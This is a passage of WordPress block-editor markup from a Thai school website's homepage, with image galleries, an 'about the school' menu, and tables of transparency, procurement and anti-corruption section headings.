{\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 